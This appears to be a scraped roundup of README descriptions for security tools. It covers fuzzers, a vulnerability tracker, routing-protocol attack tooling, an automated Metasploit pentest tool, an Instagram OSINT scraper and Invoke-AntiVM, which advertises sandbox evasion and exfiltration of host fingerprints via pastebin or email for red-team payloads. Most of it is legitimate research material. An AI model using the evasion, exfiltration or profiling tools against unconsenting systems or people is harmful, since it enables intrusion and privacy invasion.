Modified: 13.10.2020 23:20:39
LastModifiedBy:
LastPrinted: 13.10.2020 23:20:39
Language:
Identifier:


Bulwark - An Organizational Asset And Vulnerability Management Tool, With Jira Integration, Designed For Generating Application Security Reports



An organizational asset and vulnerability management tool, with Jira integration, designed for generating application security reports.



Jira Integration



Note

Please keep in mind that this project is in early development.


Launch with Docker
  1. Install Docker
  2. Create a .env file and supply the following properties:
MYSQL_DATABASE="bulwark"
MYSQL_PASSWORD="bulwark"
MYSQL_ROOT_PASSWORD="bulwark"
MYSQL_USER="root"
MYSQL_DB_CHECK="mysql"
DB_PASSWORD="bulwark"
DB_URL="172.16.16.3"
DB_ROOT="root"
DB_USERNAME="bulwark"
DB_PORT=3306
DB_NAME="bulwark"
DB_TYPE="mysql"
NODE_ENV="production"
DEV_URL="http://localhost:4200"
PROD_URL="http://localhost:5000"
JWT_KEY="changeme"
JWT_REFRESH_KEY="changeme"
CRYPTO_SECRET="changeme"
CRYPTO_SALT="changeme"

Build and start Bulwark containers:

docker-compose up -d

Start/Stop Bulwark containers:

docker-compose start
docker-compose stop

Remove Bulwark containers:

docker-compose down

Bulwark will be available at localhost:5000


Local Installation
$ git clone (url)
$ cd bulwark
$ npm install

Run in development mode:

$ npm run start:dev

Run in production mode:

$ npm start

Environment variables

Create a .env file in the root directory. This will be parsed with dotenv by the application.


DB_PASSWORD

DB_PASSWORD="somePassword"

Set this variable to the database password


DB_USERNAME

DB_USERNAME="foobar"

Set this variable to the database user name


DB_URL

DB_URL=something-foo-bar.dbnet

Set this variable to the database URL


DB_PORT

DB_PORT=3306

Set this variable to the database port


DB_NAME

DB_NAME="foobar"

Set this variable to the database connection name


DB_TYPE

DB_TYPE="mysql"

The application was developed using a MySQL database. See the typeorm documentation for more database options.


NODE_ENV

NODE_ENV=production

Set this variable to determine the node environment


DEV_URL="http://localhost:4200"

Only update if a different port is required


PROD_URL="http://localhost:5000"

Only update if a different port is required


JWT_KEY

JWT_KEY="changeMe"

Set this variable to the JWT secret


JWT_REFRESH_KEY

JWT_REFRESH_KEY="changeMe"

Set this variable to the refresh JWT secret


CRYPTO_SECRET

CRYPTO_SECRET="randomValue"

Set this variable to the Scrypt password.


CRYPTO_SALT

CRYPTO_SECRET="randomValue"

Set this variable to the Scrypt salt.


Empty .env file template
DB_PASSWORD=""
DB_URL=""
DB_USERNAME=""
DB_PORT=3306
DB_NAME=""
DB_TYPE=""
NODE_ENV=""
DEV_URL="http://localhost:4200"
PROD_URL="http://localhost:5000"
JWT_KEY=""
JWT_REFRESH_KEY=""
CRYPTO_SECRET=""
CRYPTO_SALT=""

Create Initial Database Migration
  1. Create the initial database migration
$ npm run migration:init
  2. Run the initial database migration
$ npm run migration:run

Default credentials

A user account is created on initial startup with the following credentials:

  • email: admin@example.com
  • password: changeMe

Upon first login, update the default user password under the profile section.


Built With

Team

The Softrams Bulwark core development team are:



Invoke-Antivm - Powershell Tool For VM Evasion



Invoke-AntiVM is a set of modules to perform VM detection and fingerprinting (with exfiltration) via Powershell.


Compatibility

Run the script check-compatibility.ps1 to check which modules or functions are compatible with your PowerShell version. Our goal is to achieve compatibility down to PowerShell 2.0, but we are not there yet. Please run check-compatibility.ps1 to see what the current compatibility issues are.


Background

We wrote this tool to unify several techniques for identifying VM or sandbox technologies. It relies on both signature and behavioural signals to identify whether a host is a VM or not. The modules are categorized into logical groups: CPU, Execution, Network, Programs. The user can also decide to exfiltrate a fingerprint of the target host to determine which features can be used to identify a sandbox or VM solution.


Purpose

Invoke-AntiVM was developed to understand the implications of using obfuscation and anti-VM tricks in PowerShell payloads. We hope this will help red teams avoid analysis of their payloads and blue teams understand how to deobfuscate a script with evasion techniques. You can either use the main module file Invoke-AntiVM.psd1 or the individual .ps1 script files if you want to reduce the size.


Usage

Usage examples are provided in the following scripts:

  • detect.ps1: this shows an example script of how to call the different tests
  • usage.ps1: this shows basic usage
  • usage_more.ps1: this shows more advanced functions
  • usage_exfil.ps1: this shows how to exfiltrate host information as a json document via pastebin, web or email
  • usage_fingerprint_file.ps1: this shows the exfiltration module and what data is generated in the form of a json document
  • poc_fingerprint_combined.ps1: this shows the fingerprinting module used against online sandboxes
  • output/poc.docm: this shows an example MS Word attack with a macro to call the fingerprinting module (uploaded previously to a server)

The folder pastebin contains the following scripts:

  • full_fingerprints.py, which downloads all the pastes
  • decode_pastebins.ps1, which decompresses and decodes the fingerprint documents

Make sure you use the same encryption key you used during the exfiltration step. The folder package shows how to package all the scripts into a single file for better portability. The folder pastebin shows how to automatically pull and decode the exfiltrated documents from pastebin.


Installation

The source code for Invoke-AntiVM is hosted on GitHub, and you may download, fork and review it from this repository (https://github.com/robomotic/invoke-antivm). Please report issues or feature requests through GitHub's bug tracker associated with this project.

To install: run the script install_module.ps1
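A minimal sketch of invoking the installer from a command prompt, assuming you are in the cloned repository root (standard powershell.exe flags):

powershell -ExecutionPolicy Bypass -File .\install_module.ps1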


Routopsy - A Toolkit Built To Attack Often Overlooked Networking Protocols



Routopsy is a toolkit built to attack often-overlooked networking protocols. Routopsy currently supports attacks against Dynamic Routing Protocols (DRP) and First-Hop Redundancy Protocols (FHRP). Most of the attacks currently implemented make use of a weaponised 'virtual router' as opposed to implementing protocols from scratch. The tooling is not limited to the virtual routers, and allows further attacks to be implemented in Python 3 or by adding additional containers.


For further information regarding usage, refer to the wiki at https://github.com/sensepost/routopsy/wiki



Fuzzilli - A JavaScript Engine Fuzzer



A (coverage-)guided fuzzer for dynamic language interpreters based on a custom intermediate language ("FuzzIL") which can be mutated and translated to JavaScript.


Usage

The basic steps to use this fuzzer are:

  1. Download the source code for one of the supported JavaScript engines. See the Targets/ directory for the list of supported JavaScript engines.
  2. Apply the corresponding patches from the target's directory. Also see the README.md in that directory.
  3. Compile the engine with coverage instrumentation (requires clang >= 4.0) as described in the README.
  4. Compile the fuzzer: swift build [-c release].
  5. Run the fuzzer: swift run [-c release] FuzzilliCli --profile=<profile> [other cli options] /path/to/jsshell. See also swift run FuzzilliCli --help.
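As a concrete illustration of steps 4 and 5, building in release mode and fuzzing a JavaScriptCore shell might look like this (the profile name and shell path are illustrative):

swift build -c release
swift run -c release FuzzilliCli --profile=jsc /path/to/jsc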

Building and running Fuzzilli and the supported JavaScript engines inside Docker and on Google Compute Engine is also supported.


Hacking

Check out main.swift to see a usage example of the Fuzzilli library and play with the various configuration options. Next, take a look at Fuzzer.swift for the high-level fuzzing logic. From there, dive into any part that seems interesting.

Patches, additions, and other contributions to this project are very welcome! However, do quickly check the notes for contributors. Fuzzilli roughly follows Google's code style guide for Swift.

It would be much appreciated if you could send a short note (possibly including a CVE number) to saelo@google.com or open a pull request for any vulnerability found with the help of this project so it can be included in the bug showcase section. Other than that you can of course claim any bug bounty, CVE credits, etc. for the vulnerabilities :)


Concept

When fuzzing for core interpreter bugs, e.g. in JIT compilers, semantic correctness of generated programs becomes a concern. This is in contrast to most other scenarios, e.g. fuzzing of runtime APIs, in which case semantic correctness can easily be worked around by wrapping the generated code in try-catch constructs. There are different possibilities to achieve an acceptable rate of semantically correct samples, one of them being a mutational approach in which all samples in the corpus are also semantically valid. In that case, each mutation only has a small chance of turning a valid sample into an invalid one.

To implement a mutation-based JavaScript fuzzer, mutations to JavaScript code have to be defined. Instead of mutating the AST, or other syntactic elements of a program, a custom intermediate language (IL) is defined on which mutations to the control and data flow of a program can more directly be performed. This IL is afterwards translated to JavaScript for execution. The intermediate language looks roughly as follows:

v0 <- LoadInteger '0'
v1 <- LoadInteger '10'
v2 <- LoadInteger '1'
v3 <- LoadInteger '0'
BeginFor v0, '<', v1, '+', v2 -> v4
    v6 <- BinaryOperation v3, '+', v4
    Reassign v3, v6
EndFor
v7 <- LoadString 'Result: '
v8 <- BinaryOperation v7, '+', v3
v9 <- LoadGlobal 'console'
v10 <- CallMethod v9, 'log', [v8]

Which can e.g. be trivially translated to the following JavaScript code:

const v0 = 0;
const v1 = 10;
const v2 = 1;
let v3 = 0;
for (let v4 = v0; v4 < v1; v4 = v4 + v2) {
    const v6 = v3 + v4;
    v3 = v6;
}
const v7 = "Result: ";
const v8 = v7 + v3;
const v9 = console;
const v10 = v9.log(v8);

Or to the following JavaScript code by inlining intermediate expressions:

let v3 = 0;
for (let v4 = 0; v4 < 10; v4++) {
    v3 = v3 + v4;
}
console.log("Result: " + v3);

FuzzIL has a number of properties:

  • A FuzzIL program is simply a list of instructions.
  • A FuzzIL instruction is an operation together with input and output variables and potentially one or more parameters (enclosed in single quotes in the notation above).
  • Inputs to instructions are always variables, there are no immediate values.
  • Every output of an instruction is a new variable, and existing variables can only be reassigned through dedicated operations such as the Reassign instruction.
  • Every variable is defined before it is used.

A number of mutations can then be performed on these programs:

  • InputMutator: replaces input variables of instructions with different ones to mutate the dataflow of the program.
  • CodeGenMutator: generates code and inserts it somewhere in the mutated program. Code is generated either by running a code generator or by copying some instructions from another program in the corpus (splicing).
  • CombineMutator: inserts a program from the corpus into a random position in the mutated program.
  • OperationMutator: mutates the parameters of operations, for example replacing an integer constant with a different one.
  • and more...

Implementation

The fuzzer is implemented in Swift, with some parts (e.g. coverage measurements, socket interactions, etc.) implemented in C.


Architecture

A fuzzer instance (implemented in Fuzzer.swift) is made up of the following central components:

  • MutationFuzzer: produces new programs from existing ones by applying mutations. Afterwards executes the produced samples and evaluates them.
  • ScriptRunner: executes programs of the target language.
  • Corpus: stores interesting samples and supplies them to the core fuzzer.
  • Environment: has knowledge of the runtime environment, e.g. the available builtins, property names, and methods.
  • Minimizer: minimizes crashing and interesting programs.
  • Evaluator: evaluates whether a sample is interesting according to some metric, e.g. code coverage.
  • Lifter: translates a FuzzIL program to the target language (JavaScript).

Furthermore, a number of modules are optionally available:

The fuzzer is event-driven, with most of the interactions between different classes happening through events. Events are dispatched e.g. as a result of a crash or an interesting program being found, a new program being executed, a log message being generated and so on. See Events.swift for the full list of events. The event mechanism effectively decouples the various components of the fuzzer and makes it easy to implement additional modules.

A FuzzIL program can be built up using a ProgramBuilder instance. A ProgramBuilder provides methods to create and append new instructions, append instructions from another program, retrieve existing variables, query the execution context at the current position (e.g. whether it is inside a loop), and more.


Execution

Fuzzilli uses a custom execution mode called REPRL (read-eval-print-reset-loop). For that, the target engine is modified to accept a script input over pipes and/or shared memory, execute it, then reset its internal state and wait for the next script. This removes the overhead of process creation and, to a large extent, of engine initialization.


Scalability

There is one Fuzzer instance per target process. This enables synchronous execution of programs and thereby simplifies the implementation of various algorithms such as consecutive mutations and minimization. Moreover, it avoids the need to implement thread-safe access to internal state, e.g. the corpus. Each fuzzer instance has its own DispatchQueue, conceptually corresponding to a single thread. As a rule of thumb, every interaction with a Fuzzer instance must happen on that instance’s dispatch queue. This guarantees thread-safety as the queue is serial. For more details see the docs.

To scale, fuzzer instances can become workers, in which case they report newly found interesting samples and crashes to a master instance. In turn, the master instances also synchronize their corpus with the workers. Communication between masters and workers can happen in different ways, each implemented as a module:

  • Inter-thread communication: synchronize instances in the same process by enqueuing tasks to the other fuzzer’s DispatchQueue.
  • Inter-process communication (TODO): synchronize instances over an IPC channel.
  • Inter-machine communication: synchronize instances over a simple TCP-based protocol.

This design allows the fuzzer to scale to many cores on a single machine as well as to many different machines. As one master instance can quickly become overloaded if too many workers send programs to it, it is also possible to configure multiple tiers of master instances, e.g. one master instance, 16 intermediate masters connected to the master, and 256 workers connected to the intermediate masters.


Resources

Further resources about this fuzzer:

  • A presentation about Fuzzilli given at Offensive Con 2019.
  • The master's thesis for which the initial implementation was done.
  • A blogpost by Sensepost about using Fuzzilli to find a bug in v8
  • A blogpost by Doyensec about fuzzing the JerryScript engine with Fuzzilli

Bug Showcase

The following is a list of some of the bugs found with the help of Fuzzilli. Only bugs with security impact are included in the list. Special thanks to all users of Fuzzilli who have reported bugs found by it!


WebKit/JavaScriptCore
  • Issue 185328: DFG Compiler uses incorrect output register for NumberIsInteger operation
  • CVE-2018-4299: performProxyCall leaks internal object to script
  • CVE-2018-4359: compileMathIC produces incorrect machine code
  • CVE-2019-8518: OOB access in FTL JIT due to LICM moving array access before the bounds check
  • CVE-2019-8558: CodeBlock UaF due to dangling Watchpoints
  • CVE-2019-8611: AIR optimization incorrectly removes assignment to register
  • CVE-2019-8623: Loop-invariant code motion (LICM) in DFG JIT leaves stack variable uninitialized
  • CVE-2019-8622: DFG's doesGC() is incorrect about the HasIndexedProperty operation's behaviour on StringObjects
  • CVE-2019-8671: DFG: Loop-invariant code motion (LICM) leaves object property access unguarded
  • CVE-2019-8672: JSValue use-after-free in ValueProfiles
  • CVE-2019-8678: JSC fails to run haveABadTime() when some prototypes are modified, leading to type confusions
  • CVE-2019-8685: JSPropertyNameEnumerator uses wrong structure IDs
  • CVE-2019-8765: GetterSetter type confusion during DFG compilation
  • CVE-2019-8820: Type confusion during bailout when reconstructing arguments objects
  • CVE-2020-3901: GetterSetter type confusion in FTL JIT code (due to not always safe LICM)

Gecko/Spidermonkey
  • CVE-2018-12386: IonMonkey register allocation bug leads to type confusions
  • CVE-2019-9791: IonMonkey's type inference is incorrect for constructors entered via OSR
  • CVE-2019-9792: IonMonkey leaks JS_OPTIMIZED_OUT magic value to script
  • CVE-2019-9816: unexpected ObjectGroup in ObjectGroupDispatch operation
  • CVE-2019-9813: IonMonkey compiled code fails to update inferred property types, leading to type confusions
  • CVE-2019-11707: IonMonkey incorrectly predicts return type of Array.prototype.pop, leading to type confusions
  • CVE-2020-15656: Type confusion for special arguments in IonMonkey

Chromium/v8

Duktape
  • Issue 2323: Unstable valstack pointer in putprop
  • Issue 2320: Memcmp pointer overflow in string builtin

JerryScript
  • CVE-2020-13991: Incorrect release of spread arguments
  • Issue 3784: Memory corruption due to incorrect property enumeration
  • CVE-2020-13623: Stack overflow via property keys for Proxy objects
  • CVE-2020-13649 (1): Memory corruption due to error handling in case of OOM
  • CVE-2020-13649 (2): Memory corruption due to error handling in case of OOM
  • CVE-2020-13622: Memory corruption due to incorrect handling of property keys for Proxy objects
  • CVE-2020-14163: Memory corruption due to race condition triggered by garbage collection when adding key/value pairs
  • Issue 3813: Incorrect error handling in SerializeJSONProperty function
  • Issue 3814: Unexpected Proxy object in ecma_op_function_has_instance assertion
  • Issue 3836: Memory corruption due to incorrect TypedArray initialization
  • Issue 3837: Memory corruption due to incorrect memory handling in getOwnPropertyDescriptor

Disclaimer

This is not an officially supported Google product.



SIRAS - Security Incident Response Automated Simulations



Security Incident Response Automated Simulations (SIRAS) are internal/controlled actions that provide a structured opportunity to practice the incident response plan and procedures during realistic scenarios. The main idea of SIRAS is to create detection-as-code testing scenarios to facilitate blue-team/tabletop exercises. All SIRAS smokers perform real actions in your AWS account and then delete those actions within the same execution.

SIRAS is the incident responder's friend when you need to test your controls and alerts :)


Why SIRAS?

Incident detection and response teams develop different mechanisms to prevent and detect several types of incidents, but the testing stage is often left aside: each alert or automation is tested before it is implemented, yet it is not continuously verified afterwards. SIRAS addresses this with an automated test model that triggers alerts in a controlled manner to simulate security incidents.


How to run:

1- ACTIVATE VIRTUALENV

virtualenv siras && source ./siras/bin/activate

2- RUN THE TEST SMOKER

python3 siras.py -s test

OPTIONS TO RUN (needed)

-s for the "smoker"

-s      Description
all     run all smokers.
test    test that SIRAS works.
sg      Create an open security group in AWS and then nuke it.
pa      Multiple failed logins against the Palo Alto VPN portal (please configure "pano_url" in smoker/PanAuthSmoker.py).
au      Create an administrator user in AWS.
aca     Multiple failed logins against the AWS console portal (please configure "account_id" in smoker/awsConsoleAuthSmoker.py).
ctr     Create and delete a CloudTrail logging trail.
s3p     Create a public S3 bucket.
esb     Create a public EBS snapshot (please configure your snapshot ID in smoker/EBSPublicSmoker, line 27).

OPTIONS TO RUN (optional)
-b      Description
True    save results into an S3 bucket.
False   default; just print the output to the console.
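
For example, a minimal combined run might look like the following sketch; the flag values come from the tables above, while the bucket name is a placeholder:

# Run the open security group smoker and save the results to S3
# (bucket name is an assumption; BUCKETS3 is described under Requirements below)
export BUCKETS3=my-siras-logs
python3 siras.py -s sg -b True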

Requirements
  • Python
  • VirtualEnv
  • AWS credentials
  • An ENV variable named 'BUCKETS3' with the bucket to save the logs into when -b is "True".
  • (If you don't want to use virtualenv) pip to install requirements.txt

Future Integrations
  • Kubernetes smokers
  • VPC changes
  • EC2 Infected Smoker.
  • GuardDuty Changes.

Request New Modules/Publish

Please feel free to publish or request new modules or use cases: open an issue in the repo or submit a PR.




Amlsec - Automated Security Risk Identification Using AutomationML-based Engineering Data



This prototype identifies security risk sources (i.e., threats and vulnerabilities) and types of attack consequences based on AutomationML (AML) artifacts. The results of the risk identification process can be used to generate cyber-physical attack graphs, which model multistage cyber attacks that potentially lead to physical damage.


Installation
  1. Build AML2OWL

This prototype depends on a forked version of the implementation of the bidirectional translation between AML and OWL for the ETFA 2019 paper "Interpreting OWL Complex Classes in AutomationML based on Bidirectional Translation" by Hua and Hein. Clone the repository, compile the projects, and assemble an application bundle of aml_owl:

$ cd aml_models
$ mvn clean compile install
$ cd ../aml_io
$ mvn clean compile install
$ cd ../aml_owl
$ mvn clean compile install assembly:single
  2. Setup the AMLsec Base Directory

Clone this repository, create the application base directory (usually located in the user's home directory), and place the files located in amlsec-base-dir and the assembled AML2OWL JAR (located in aml_owl/target/) there. The AMLsec base directory and the path to the AML2OWL JAR must be set in the configuration file using the keys baseDir and amlToOwlProgram, respectively.
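
As a hedged sketch, the two entries might look as follows; the config file location and the paths shown are assumptions, not taken from the project:

# Hypothetical configuration excerpt; adjust paths to your setup
baseDir = "/home/user/amlsec"
amlToOwlProgram = "/home/user/amlsec/aml_owl-jar-with-dependencies.jar"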

  3. Setup Apache Jena Fuseki

Install and start Apache Jena Fuseki:

$ java -jar <path_to_apache-jena-fuseki-X.Y.Z>/fuseki-server.jar --update
  4. Build AMLsec

Finally, build and start the app by using sbt.

$ sbt "runMain org.sba_research.worker.Main"

Usage

The implemented method utilizes a semantic information mapping mechanism realized by means of AML libraries. These AML security extension libraries can be easily reused in engineering projects by importing them into AML files.

The capabilities of this prototype are demonstrated in a case study. Running this prototype as is will yield the knowledge base (can be accessed via Fuseki), which also includes the results of the risk identification process, and the following pruned cyber-physical attack graph:



Cluster

The prototype utilizes the Akka framework and is able to distribute the risk identification workload among multiple nodes. The Akka distributed workers sample was used as a template.

To run the cluster with multiple nodes:

  1. Start Cassandra:
$ sbt "runMain org.sba_research.worker.Main cassandra"
  2. Start the first seed node:
$ sbt "runMain org.sba_research.worker.Main 2551"
  3. Start a front-end node:
$ sbt "runMain org.sba_research.worker.Main 3001"
  4. Start a worker node (the second parameter denotes the number of worker actors, e.g., 3):
$ sbt "runMain org.sba_research.worker.Main 5001 3"

If you run the nodes on separate machines, you will have to adapt the Akka settings in the configuration file.


Performance Assessment

The measurements and log files obtained during the performance assessment are available upon request.



Osi.Ig - Information Gathering Instagram



  • The InstagramOSINT Tool gets a range of information from an Instagram account that you normally wouldn't be able to get from just looking at their profile

  • The information includes:

  • [ profile ] : user id, followers / following, number of uploads, profile img URL, business enum, external URL, joined Recently, etc

  • [ tags & mentions ] : most used hashtags and mentioned accounts

  • [ email ] : if an email address is used anywhere, it will be displayed

  • [ posts ] : accessibility caption, location, timestamp, caption, picture URL, etc

    • ( not yet working correctly with posts Instagram marks as 'sensitive content' )

• How To Install

$ pkg install -y git

$ git clone https://github.com/th3unkn0n/osi.ig.git && cd osi.ig

$ python3 -m pip install -r requirements.txt


• Usage

$ python3 main.py -u username

$ python3 main.py -h

-p, --post images info highlight
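
For example, to also fetch post information for a target profile (using the flags shown above):

$ python3 main.py -u username -p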


• Update

$ git pull



ToothPicker - An In-Process, Coverage-Guided Fuzzer For iOS



ToothPicker is an in-process, coverage-guided fuzzer for iOS. It was developed to specifically target iOS's Bluetooth daemon bluetoothd and to analyze various Bluetooth protocols on iOS. As it is built using FRIDA, it can be adapted to target any platform that runs FRIDA.

This repository also includes an over-the-air fuzzer with an exemplary implementation to fuzz Apple's MagicPairing protocol using InternalBlue. Additionally, it contains the ReplayCrashFile.py script that can be used to verify crashes the in-process fuzzer has found.


In-Process Fuzzer

The In-Process Fuzzer works out-of-the-box on various iOS versions (13.3-13.6 tested), but symbols need to be specified. Other iOS versions require adaptions to function addresses. Additionally, it seems like FRIDA's stalker has some problems with the iPhone 8. On newer iPhones that support PAC, the performance significantly suffers from signing pointers. Thus, it is recommended to run this on an iPhone 7.

ToothPicker is built on the codebase of frizzer. However, it has been adapted for this specific application and is therefore no longer compatible with the original version. There are plans to replace this with a more dedicated component in the future.


Prerequisites:

On the iPhone:

On Linux:

For Arch-based Linux:

# usbmuxd typically comes with libimobiledevice
# but just to be sure, we manually install it as well
sudo pacman -S usbmuxd libimobiledevice python-virtualenv radamsa

# Connect the iPhone to the computer
# Unlock it.
# If a pairing message pops up, click "Trust"
# If no pairing message pops up:
idevicepair pair
# Now there should be the pop up, accept and then again:
idevicepair pair

# In case of connection errors:
sudo systemctl restart usbmuxd
# or pair phone and computer again


# Other useful commands

# To ssh into the iPhone:
# Checkra1n comes with an SSH server listening on Port 44
# Proxy the phone's SSH port to 4444 localport:
iproxy 4444 44
# Connect:
ssh root@localhost -p 4444
# Default password: alpine

# To fetch some device information of the phone:
ideviceinfo

For Debian Linux:

Almost the same as above. Exceptions:

  • radamsa needs to be installed from the git repository because it is not packaged (see the sketch after this list).
  • The command iproxy requires the additional package libusbmuxd-tools.
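
A minimal sketch of the Debian-specific steps, assuming the upstream radamsa repository and common Debian package names:

# Debian package names are assumptions
sudo apt install usbmuxd libimobiledevice-utils libusbmuxd-tools git gcc make

# Build radamsa from source since it is not packaged on Debian
git clone https://gitlab.com/akihe/radamsa.git
cd radamsa && make && sudo make install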

For macOS:

Slightly different commands compared to the Arch Linux setup...

brew install libimobiledevice usbmuxd radamsa npm
idevicepair pair
npm install frida-compile
pip3 install frida-tools

On macOS, PacketLogger, which is part of the Additional Tools for Xcode, can decode various packets once the Bluetooth Debug Profile is installed. Moreover, if you open iOS crash logs with Xcode, it will add some symbols.


Setup and Fuzzing

Setup:

  • It is recommended to set up a virtual Python environment for frizzer.
  • Install the required packages by running pip from within the frizzer directory.
  • The projects directory contains an example project to fuzz the MagicPairing protocol.
  • To build the harness, compile the general harness and the specialized MagicPairing harness into one file.
  • cd into the harness directory and install frida-compile. Note that this needs to be run in that folder and can be directly installed as user by running npm install frida-compile.
  • Now run frida-compile ../projects/YOUR_PROJECT/YOUR_SPECIALIZED_HARNESS.JS -o ../projects/YOUR_PROJECT/harness.js. As this was installed in npm context it might require running npx frida-compile instead. Each time the harness changes, you need to rerun frida-compile.

Fuzzing:

  • Connect an iOS device to your computer.
  • It is advisable to put the phone in flight mode and turn on the "Do not disturb" feature to limit any other activity on the phone.
  • Run killall -9 bluetoothd to freshly start bluetoothd.
  • Make sure the phone does not connect to other Bluetooth devices.
  • Now, cd back into your project's directory, create the crashlog-directory (mkdir crashes) and run ../../frizzer/fuzzer.py fuzz -p .
  • Yay! Now collect zero days and obtain large amounts of cash from Apple! (Or collect a huge list of useless NULL-pointer dereferences...)

In short, for starting a new project, run:

cd harness
npx frida-compile ../projects/YOUR_PROJECT/YOUR_SPECIALIZED_HARNESS.JS -o ../projects/YOUR_PROJECT/harness.js
cd ../projects/YOUR_PROJECT/
mkdir crashes
frizzer fuzz -p .

You can start with a different seed by using frizzer fuzz --seed 1234 -p ..

Adding new iOS versions:

Currently, different versions of iOS are defined in bluetoothd.js. You can find these with the Ghidra versioning tool given an initial version that has all the required symbols. Note that some of them are not named in the original iOS binary, so ideally start with one that was already annotated before. Each time the bluetoothd.js changes, you need to re-run frida-compile.

Increasing bluetoothd capacities:

iOS crash logs are stored in Settings -> Privacy -> Analytics & Improvements -> Analytics Data. If they contain bluetoothd crashes matching the pattern bluetoothd.cpu_resource-*.ips, the crash was caused by exceeding resource limits. These limits can be increased as follows.

On an iPhone 7, run:

cd /System/Library/LaunchDaemons/
plistutil -i com.apple.jetsamproperties.D10.plist -o com.apple.jetsamproperties.D10.plist.txt
plistutil -i com.apple.jetsamproperties.D101.plist -o com.apple.jetsamproperties.D101.plist.txt

On the iPhone SE2, these are in com.apple.jetsamproperties.D79.plist:

cd /System/Library/LaunchDaemons/
plistutil -i com.apple.jetsamproperties.D79.plist -o com.apple.jetsamproperties.D79.plist.txt

Search for bluetoothd, update the priority to 19 (highest valid priority) and set the memory limit to something very high. Apply the same changes to both files.

<dict>
<key>ActiveSoftMemoryLimit</key>
<integer>24000</integer>
<key>InactiveHardMemoryLimit</key>
<integer>24000</integer>
<key>EnablePressuredExit</key>
<false/>
<key>JetsamPriority</key>
<integer>19</integer>
</dict>

Write the changes back and restart bluetoothd.

plistutil -i com.apple.jetsamproperties.D10.plist.txt -o com.apple.jetsamproperties.D10.plist
plistutil -i com.apple.jetsamproperties.D101.plist.txt -o com.apple.jetsamproperties.D101.plist
killall -9 bluetoothd

Respectively on the iPhone SE2:

plistutil -i com.apple.jetsamproperties.D79.plist.txt -o com.apple.jetsamproperties.D79.plist
killall -9 bluetoothd

Deleting old logs:

iOS stops saving crash logs for one program after the limit of 25 is reached. If loading a crash log with Xcode (via Simulators&Devices), some symbols are added to the stack trace. Once the limit is reached, the logs can either be removed via Xcode or directly on the iOS device by deleting them in the folder /var/mobile/Library/Logs/CrashReporter/.
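
As a hedged example, the logs can be removed over the SSH connection set up earlier; the exact file names vary per crash:

# Delete old bluetoothd crash logs directly on the device
ssh -p 4444 root@localhost 'rm /var/mobile/Library/Logs/CrashReporter/bluetoothd*.ips'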

A12+:

Starting from the iPhone XR/Xs, PAC has been introduced. This requires calling sign() on NativeFunction in FRIDA. While this is a no-op on earlier CPUs, this tremendously reduces speed on newer devices, but is required to make them work at all. We observed that ToothPicker operates at half the speed when using an iPhone SE2 instead of an iPhone 7.


Over-the-Air Fuzzer and Crash Replay

The MagicPairing implementation of the over-the-air fuzzer requires InternalBlue to be installed and can be executed by running python MagicPairingFuzzer.py TARGET_BD_ADDR.

If you want to reproduce crashes, use the ReplayCrashFile.py script, which can take a crash file and initiates an over-the-air connection with a payload based on the crash.
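
A hedged usage sketch; the Bluetooth address and crash file path are placeholders, and the exact argument format of ReplayCrashFile.py may differ:

# Over-the-air fuzzing of MagicPairing via InternalBlue
python MagicPairingFuzzer.py 13:37:ba:be:13:37

# Replay a crash file found by the in-process fuzzer
python ReplayCrashFile.py projects/YOUR_PROJECT/crashes/SOME_CRASH_FILE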



Xerror - Fully Automated Pentesting Tool


Xerror is an automated penetration testing tool that helps security professionals and non-professionals automate their pentesting tasks. Xerror performs all tests and, at the end, generates two reports: one for executives and one for analysts.

Xerror provides an easy-to-use, menu-driven GUI. Internally it uses OpenVAS for vulnerability scanning and Metasploit for exploitation, and it offers GUI-based options after successful exploitation, e.g. Meterpreter sessions. It is built primarily in Python.


Xerror is built on Python 2 as the primary language and Django 2 as the web framework, along with WebSockets (Django Channels) on a Celery server and a Redis server to achieve asynchronous execution. On the front end it uses Django's default template engine language, which is Jinja2, and jQuery.

How to use this project:

1. Activate the virtual environment:
source env/bin/activate

2. Start the Redis server:
service redis-server start

3. Start the Python server:
cd xerror
python manage.py runserver

4. Start the Celery worker:
cd xerror
celery -A xerror worker -l info

5. Start the msfrpc server:
msfrpcd -P 123 -S -a 127.0.0.1

6. Start the OpenVAS server; by default, set the OMP server credentials to admin@admin on 127.0.0.1:9392.

You are good to go.

This is the Xerror beta version; the complete version will be uploaded soon with a full explanation and details of each step.

Contact: exploitmee@protonmail.com



UAFuzz - Binary-level Directed Fuzzing For Use-After-Free Vulnerabilities



Directed Greybox Fuzzing (DGF) like AFLGo aims to perform stress testing on pre-selected, potentially vulnerable target locations, with applications to different security contexts: (1) bug reproduction, (2) patch testing or (3) static analysis report verification. Recent research has further improved directed fuzzing's effectiveness and efficiency (see awesome-directed-fuzzing).


We propose UAFuzz, a directed fuzzer dedicated to Use-After-Free (UAF) bugs at the binary level, which carefully tunes the key components of directed fuzzing to the specific characteristics of this bug class. UAF bugs appear when a heap element is used after having been freed. Detecting UAF bugs is hard: (1) complexity, because a Proof-of-Concept (PoC) input needs to trigger a sequence of three events (alloc, free and use) on the same memory location, spanning multiple functions of the tested program; and (2) silence, with no segmentation fault.

Overall, UAFuzz has a similar workflow to directed fuzzers, with our modifications highlighted in orange along the whole fuzzing process, as shown in the following figure. As we focus on (1) bug reproduction and (2) patch testing, it is likely that we have (mostly) complete stack traces of all memory-related UAF events. Unlike existing general directed approaches, where targets can be selected independently, we take into account the relationships among targets (e.g., the ordering, which is essential for UAFs) to improve directedness. First, the static precomputation of UAFuzz is fast at the binary level. Second, we introduce new ordering-aware input metrics to guide the fuzzer towards targets at runtime. Finally, we triage only potential inputs covering all targets of the expected trace, and pre-filter inputs that are less likely to trigger the bug.


 

More details are in our paper at RAID'20 and our talk at Black Hat USA'20. Thanks also to Sébastien Bardin, Matthieu Lemerre, Prof. Roland Groz, and especially Richard Bonichon (@rbonichon) for his help with OCaml.


Installation

Our tested environment is Ubuntu 16.04 64-bit.

# Install Ocaml and prerequisite packages for BINSEC via OPAM
sudo apt update
sudo apt install ocaml ocaml-native-compilers camlp4-extra opam
opam init
opam switch 4.05.0
opam install merlin ocp-indent caml-mode tuareg menhir ocamlgraph ocamlfind piqi zmq.5.0.0 zarith llvm.6.0.0

# Install Python's packages
sudo pip install networkx pydot

# Checkout source code
git clone https://github.com/strongcourage/uafuzz.git

# Environment variables
export IDA_PATH=/path/to/ida-6.9/idaq
export GRAPH_EASY_PATH=/path/to/graph-easy
cd uafuzz; export UAFUZZ_PATH=`pwd`

# Compile source code
./scripts/build.sh uafuzz

# Help for IDA/UAFuzz interface
./binsec/src/binsec -ida-help
./binsec/src/binsec -uafuzz-help

Code structure

